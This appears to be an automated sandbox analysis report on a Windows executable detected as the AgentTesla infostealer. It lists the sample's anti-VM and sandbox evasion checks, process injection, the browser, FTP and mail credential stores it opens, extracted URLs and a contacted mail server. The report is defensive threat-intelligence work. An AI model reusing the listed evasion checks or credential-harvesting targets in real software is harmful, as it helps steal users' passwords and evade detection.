                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 00000000.00000002.657207704.0000000002ABF000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 6Rn5G1VWPB.exe PID: 6004, type: MEMORY
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.657207704.0000000002ABF000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.657207704.0000000002ABF000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeWindow / User API: threadDelayed 1351Jump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeWindow / User API: threadDelayed 8457Jump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exe TID: 4864Thread sleep time: -101283s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exe TID: 6348Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exe TID: 980Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exe TID: 4660Thread sleep count: 1351 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exe TID: 4660Thread sleep count: 8457 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exe TID: 980Thread sleep count: 37 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeThread delayed: delay time: 101283Jump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.657207704.0000000002ABF000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.657207704.0000000002ABF000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.657207704.0000000002ABF000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.657207704.0000000002ABF000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.657207704.0000000002ABF000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.657207704.0000000002ABF000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: 6Rn5G1VWPB.exe, 00000002.00000002.918678159.0000000006150000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRYr{
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.657207704.0000000002ABF000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.657207704.0000000002ABF000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: 6Rn5G1VWPB.exe, 00000000.00000002.657207704.0000000002ABF000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeCode function: 2_2_010CF08C LdrInitializeThunk,2_2_010CF08C
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeMemory written: C:\Users\user\Desktop\6Rn5G1VWPB.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeProcess created: C:\Users\user\Desktop\6Rn5G1VWPB.exe C:\Users\user\Desktop\6Rn5G1VWPB.exeJump to behavior
                      Source: 6Rn5G1VWPB.exe, 00000002.00000002.914596019.0000000001630000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: 6Rn5G1VWPB.exe, 00000002.00000002.914596019.0000000001630000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: 6Rn5G1VWPB.exe, 00000002.00000002.914596019.0000000001630000.00000002.00000001.sdmpBinary or memory string: Progman
                      Source: 6Rn5G1VWPB.exe, 00000002.00000002.914596019.0000000001630000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeQueries volume information: C:\Users\user\Desktop\6Rn5G1VWPB.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeQueries volume information: C:\Users\user\Desktop\6Rn5G1VWPB.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000002.00000002.912960268.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.657613935.0000000003A71000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.2.6Rn5G1VWPB.exe.3b28798.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.6Rn5G1VWPB.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.6Rn5G1VWPB.exe.3b28798.4.raw.unpack, type: UNPACKEDPE
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000002.00000002.912960268.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.657613935.0000000003A71000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.915088523.0000000002CF1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 6Rn5G1VWPB.exe PID: 6004, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 6Rn5G1VWPB.exe PID: 6488, type: MEMORY
                      Source: Yara matchFile source: 0.2.6Rn5G1VWPB.exe.3b28798.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.6Rn5G1VWPB.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.6Rn5G1VWPB.exe.3b28798.4.raw.unpack, type: UNPACKEDPE
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\Desktop\6Rn5G1VWPB.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Yara matchFile source: 00000002.00000002.915088523.0000000002CF1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 6Rn5G1VWPB.exe PID: 6488, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000002.00000002.912960268.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.657613935.0000000003A71000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.2.6Rn5G1VWPB.exe.3b28798.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.6Rn5G1VWPB.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.6Rn5G1VWPB.exe.3b28798.4.raw.unpack, type: UNPACKEDPE
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000002.00000002.912960268.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.657613935.0000000003A71000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.915088523.0000000002CF1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 6Rn5G1VWPB.exe PID: 6004, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 6Rn5G1VWPB.exe PID: 6488, type: MEMORY
                      Source: Yara matchFile source: 0.2.6Rn5G1VWPB.exe.3b28798.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.6Rn5G1VWPB.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.6Rn5G1VWPB.exe.3b28798.4.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection112Masquerading1OS Credential Dumping2Query Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1Input Capture111Security Software Discovery211Remote Desktop ProtocolInput Capture111Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion131Credentials in Registry1Process Discovery2SMB/Windows Admin SharesArchive Collected Data11Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSVirtualization/Sandbox Evasion131Distributed Component Object ModelData from Local System2Scheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsApplication Window Discovery1SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncSystem Information Discovery114Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      6Rn5G1VWPB.exe27%VirustotalBrowse
                      6Rn5G1VWPB.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      2.2.6Rn5G1VWPB.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://checkip.dyndns.org/0%VirustotalBrowse
                      http://checkip.dyndns.org/0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://EPtbzE.com0%Avira URL Cloudsafe
                      http://servermanager.miixit.org/hits/hit_index.php?k=10%Avira URL Cloudsafe
                      http://servermanager.miixit.org/E0%Avira URL Cloudsafe
                      http://servermanager.miixit.org/index_ru.html0%Avira URL Cloudsafe
                      http://mail.garciadelacruz.com0%Avira URL Cloudsafe
                      http://servermanager.miixit.org/report/reporter_index.php?name=0%Avira URL Cloudsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      http://servermanager.miixit.org/0%Avira URL Cloudsafe
                      http://ThqqlGVRjff9puHH.com0%Avira URL Cloudsafe
                      http://servermanager.miixit.org/index_ru.htmlk0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://servermanager.miixit.org/downloads/0%Avira URL Cloudsafe
                      http://servermanager.miixit.org/hits/hit_index.php?k=0%Avira URL Cloudsafe
                      https://api.ipify.org%$0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.garciadelacruz.com
                      86.109.178.195
                      truetrue
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.16Rn5G1VWPB.exe, 00000002.00000002.915088523.0000000002CF1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://DynDns.comDynDNS6Rn5G1VWPB.exe, 00000002.00000002.915088523.0000000002CF1000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://checkip.dyndns.org/6Rn5G1VWPB.exefalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha6Rn5G1VWPB.exe, 00000002.00000002.915088523.0000000002CF1000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://EPtbzE.com6Rn5G1VWPB.exe, 00000002.00000002.915088523.0000000002CF1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://servermanager.miixit.org/hits/hit_index.php?k=16Rn5G1VWPB.exefalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=CJU3DBQXBUQPC6Rn5G1VWPB.exefalse
                          high
                          http://servermanager.miixit.org/E6Rn5G1VWPB.exefalse
                          • Avira URL Cloud: safe
                          unknown
                          http://servermanager.miixit.org/index_ru.html6Rn5G1VWPB.exefalse
                          • Avira URL Cloud: safe
                          unknown
                          http://mail.garciadelacruz.com6Rn5G1VWPB.exe, 00000002.00000002.915860392.000000000305E000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://servermanager.miixit.org/report/reporter_index.php?name=6Rn5G1VWPB.exefalse
                          • Avira URL Cloud: safe
                          unknown
                          https://api.ipify.org%GETMozilla/5.06Rn5G1VWPB.exe, 00000002.00000002.915088523.0000000002CF1000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          low
                          http://servermanager.miixit.org/6Rn5G1VWPB.exefalse
                          • Avira URL Cloud: safe
                          unknown
                          http://ThqqlGVRjff9puHH.com6Rn5G1VWPB.exe, 00000002.00000002.915088523.0000000002CF1000.00000004.00000001.sdmp, 6Rn5G1VWPB.exe, 00000002.00000002.915918195.000000000306D000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name6Rn5G1VWPB.exe, 00000000.00000002.657132516.0000000002A71000.00000004.00000001.sdmpfalse
                            high
                            http://servermanager.miixit.org/index_ru.htmlk6Rn5G1VWPB.exefalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip6Rn5G1VWPB.exe, 00000000.00000002.657613935.0000000003A71000.00000004.00000001.sdmp, 6Rn5G1VWPB.exe, 00000002.00000002.912960268.0000000000402000.00000040.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css6Rn5G1VWPB.exe, 00000000.00000002.657207704.0000000002ABF000.00000004.00000001.sdmpfalse
                              high
                              http://servermanager.miixit.org/downloads/6Rn5G1VWPB.exefalse
                              • Avira URL Cloud: safe
                              unknown
                              http://servermanager.miixit.org/hits/hit_index.php?k=6Rn5G1VWPB.exefalse
                              • Avira URL Cloud: safe
                              unknown
                              https://api.ipify.org%$6Rn5G1VWPB.exe, 00000002.00000002.915088523.0000000002CF1000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              low

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              86.109.178.195
                              mail.garciadelacruz.comSpain
                              196713ABANSYS_AND_HOSTYTEC-ASCCharlesRobertDarwin11EStrue

                              Private

                              IP
                              192.168.2.1

                              General Information

                              Joe Sandbox Version:32.0.0 Black Diamond
                              Analysis ID:412365
                              Start date:12.05.2021
                              Start time:16:39:38
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 8m 42s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:6Rn5G1VWPB (renamed file extension from none to exe)
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Number of analysed new started processes analysed:14
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@3/2@2/2
                              EGA Information:
                              • Successful, ratio: 100%
                              HDC Information:Failed
                              HCA Information:
                              • Successful, ratio: 97%
                              • Number of executed functions: 82
                              • Number of non-executed functions: 7
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              Warnings:
                              Show All
